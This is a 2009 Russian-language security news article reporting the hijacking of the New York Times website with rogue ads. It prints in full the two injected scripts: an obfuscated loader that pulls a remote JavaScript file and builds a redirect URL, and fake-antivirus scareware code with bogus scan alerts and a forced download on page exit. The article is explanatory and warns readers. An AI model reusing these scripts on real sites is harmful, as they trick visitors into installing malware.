Информационная безопасность компьютерных систем и защита конфиденциальных данных
SecuRRity.Ru » Уязвимые сайты » Хакеры взломали сайт газеты New York Times
Уязвимые сайты

Хакеры взломали сайт газеты New York Times

автор: Administrator | 14 сентября 2009, 21:15 | Просмотров: 4408
теги: Уязвимые сайты, Хакеры, взломал, сайт, New York Times, троян, антивирус, программа



Сайт газеты New York Times, являющейся в США одной из крупнейших федеральных газет, накануне был взломан злоумышленниками, разместившими на веб-страницах несанкционированную рекламу, а также, возможно, вредоносное программное обеспечение.

Ряд западных блоггеров сообщают, что при заходе на сайт New York Times их антивирусы детектировали наличие подгружаемого троянца(Generic14.ATGN, Heur.Packed.Unknown, Packed.Win32.Katusha.e, Artemis!85A6C733775D, Trojan:Win32/FakeXPA, Win32/Kryptik.EJ, Mal/Generic-A), однако в самой редакции наличие вредоносного кода отрицают, хотя факт размещения рекламы признают. Скорее всего антивирусы ругались на функцию eval(unescape('.....'));.

На странице сайта были вставлены две вредоносные скрипты:
1-ый код - загрузил javascript файл с сайта harlingens.com и показывал "рекламный баннер"
<script type="text/javascript">
var rightNow = new Date();
var date1 = new Date(rightNow.getFullYear(), 0, 1, 0, 0, 0, 0);
var temp = date1.toGMTString();
var date3 = new Date(temp.substring(0, temp.lastIndexOf(" ")-1));
var hoursDiffStdTime = (date1 - date3) / (1000 * 60 * 60);
tz_crt = hoursDiffStdTime;

document.write(unescape("<a href='http://www.bulgari.com/main.php?lang=6/ref=680' target='_blank'><img src='http://harlingens.com/bdb/-MISC/bulgari_300x250.gif' border='0' ></a>"));

var a1 = "http://sex-and-";
var a2 = "the-city.cn/go.php?i";
var a3 = "d=2006-63&key=0522c7066&p=1";
var action_URL = a1 + a2 + a3;
var cur_domain = "harlingens.com";

eval(unescape('document.write(unescape("<script src='http://" + cur_domain + "/includes02.js' type='text/javascript'></script>"));'));
</script>


2-ой код - дезинформировал пользователей, предлагая скачать поддельный антивирус
<script>
var pinter;var ss=15;var teracti=0;
function hideWarnDialog()
{
        if(confirm('Dont close this window, if your want you PC to be protected.')) {

        }
        else {
                emilion();
        };
};
function emilion(){
alert('Potentially dangerous software. These programs may damage your computer and steal your private information. Online Security Checker needs Personal Antivirus components to repair your computer. Please click Ok to download and install Personal Antivirus tool. ');
}
function update()
{
if ($(".progress_bar_fill").width()>0)
{
  $("#progress_prcnt").html((Math.round(100-$(".progress_bar_fill").width()/417*100))+"%");
  $("#ghfjdstg4w4g4tgf").html(gs[Math.floor(Math.random()*gs.length)] );
  if ($(".progress_bar_fill").width()<350 && teracti==0)
  {
   document.getElementById('threat1').style.visibility = 'visible';
   document.getElementById('desc').style.visibility = 'visible';
   setInterval("$('#tc1').toggleClass('none')",1000);
   teracti=1;
  }
  if ($(".progress_bar_fill").width()<200 && teracti==1)
  {
   document.getElementById('threat2').style.visibility = 'visible';
   setInterval("$('#tc2').toggleClass('none')",1000);
   teracti=2;
  }
  if ($(".progress_bar_fill").width()<100 && teracti==2)
  {
   document.getElementById('threat3').style.visibility = 'visible';
   setInterval("$('#tc3').toggleClass('none')",1000);
   setInterval("$('#tc4').toggleClass('none')",1000);
   teracti=3;
  }
}
else
{
  clearInterval(pinter);
  $(".gbsdfhdgdsg2rfd").html("<b>Scan procedures finished. 431 Probably harmfull items was found!</b>");
  setTimeout("pop2()",1000);
}
}
function Minimize()
{
window.innerWidth = 100;
window.innerHeight = 100;
window.screenX = screen.width;
window.screenY = screen.height;
alwaysLowered = true;
}
function Maximize() {window.moveTo(0,0); window.resizeTo( screen.width, screen.height );}
function download() {
window.location='/download.php?id=2006-63';
}
function away()
{
        w = window;
        ua = navigator.userAgent;
        v1 = ua.toLowerCase().indexOf('msie') != -1 && ua.toLowerCase().indexOf('opera') < 0;
        x = 11;
        eval('w.resizeTo(x*10,x*11-7)');
        w.moveTo(v1 ? (screen.width - 100) >> 1 : 11027, v1 ? (screen.height - 100) >> 1 : 10659);
}
function pop1() {
confirm('Warning!!! '+
'Your system requires immediate anti-viruses scan! Personal Antivirus can perform fast and free virus and malicious software scan of your computer .');
}
function pop2() {
confirm('Your computer remains infected by threats! '+
'They might lead to data loss and file structure damage, and needed to be heal as soon as possible.\n\n'+
'Return to Personal Antivirus and download it secure to your PC');
pop4();
}
function pop3dsds() {
alert('Your computer remains infected by threats ! '+
'They can cause data loss and file damages and need to be cured as soon as possible.\n\n'+
'Return to Personal Antivirus and download it secure to your PC');
}
function pop4() {
  document.getElementById('ap').style.display = 'block';
  $(".left_bar").css("display","none");
  $(".left_bar").css("display","block");
}
function sp2init(){
}
function loading() {
  if (window.attachEvent)
    away();
  pop1();
  Maximize();
  window.focus();
}
function loaded() {
  $("#white").css("display","none");
  $("#page_progress").css("display","block");
  $(".left_bar").css("display","none");
  $(".left_bar").css("display","block");
  $(".progress_bar_fill").animate({width:"0px"},ss*1000);
  writegeoip();
        pinter = setInterval(update,ss*10);
};
loading();
var exit = true;
var usePopDialog = true;
var nid=0;
var tid=431;
var mid=947;
var full=1;
var popDialogOptions = "dialogWidth:1024px; dialogHeight:768px; dialogTop:0px; dialogLeft:0px; edge:Raised; center:0; help:0; resizable:1; scroll:1; status:0";
var popWindowOptions = " scrollbars=1,menubar=1,toolbar=1,location=1,personalbar=1,status=1,resizable=1";
var clid = "7f09c9e1c55f7d63f02909a14c1a45e0";
var usePopDialog = true;
var isUsingSpecial = false;
dat=new Date(1252823336);
var dlth=dat.getHours()-dat.getUTCHours();
newurl = "/download.php?id=2006-63&dlth="+dlth;
var isXPSP2 = false;
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
function ext(){
       if(exit) {
               exit=false;
               emilion();
               if(!isXPSP2 && !usePopDialog) {
                         window.open(popURL,"",popWindowOptions);
               }else if(!isXPSP2 && usePopDialog) {
                         eval("window.showModalDialog(popURL,'',popDialogOptions)");
               }else{
                         iie.launchURL(popURL);
               }
        }
}
var popURL = newurl;
isUsingSpecial = true;
if (window.attachEvent)
eval("window.attachEvent('onunload',ext);");
else
window.addEventListener("unload", ext, false);
</script>

Стоит отметить, что и сама несанкционированная реклама вела пользователей на сайт, где они могли скачать поддельный антивирус. При заходе на сайт пользователи получали всплывающий баннер, где говорилось о том, что их компьютер инфицирован и предлагалось скачать антивирусное программное обеспечение.

Dont close this window, if your want you PC to be protected.
353 trojans
You need to remove this threat as soon as possible!
Scan procedures finished. 431 Probably harmfull items was found!


скриншот 1:
Хакеры взломали сайт газеты New York Times


скриншот 2:
Хакеры взломали сайт газеты New York Times


В редакции NYTimes посоветовали всем пользователям, скачавшим "антивирус" с предлагаемого сайта best-antivirus03.com, немедленно удалить его, так как эта программа представляет собой архив вредоносного программного обеспечения. После удаления необходимо проверить всю систему настоящим антивирусом.

Независимые эксперты говорят, что за последние несколько месяцев многие сайты вновь начали практиковать такой "грязный" вид рекламы, как всплывающие окна с баннерами, поэтому отличить "хорошую" рекламу от "плохой" становится все сложнее даже для искушенных пользователей.

На данный момент работа сайта американской газеты «New York Times» полностью восстановлена.




источник:
cybersecurity.ru
Обратная связь

Информация


Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.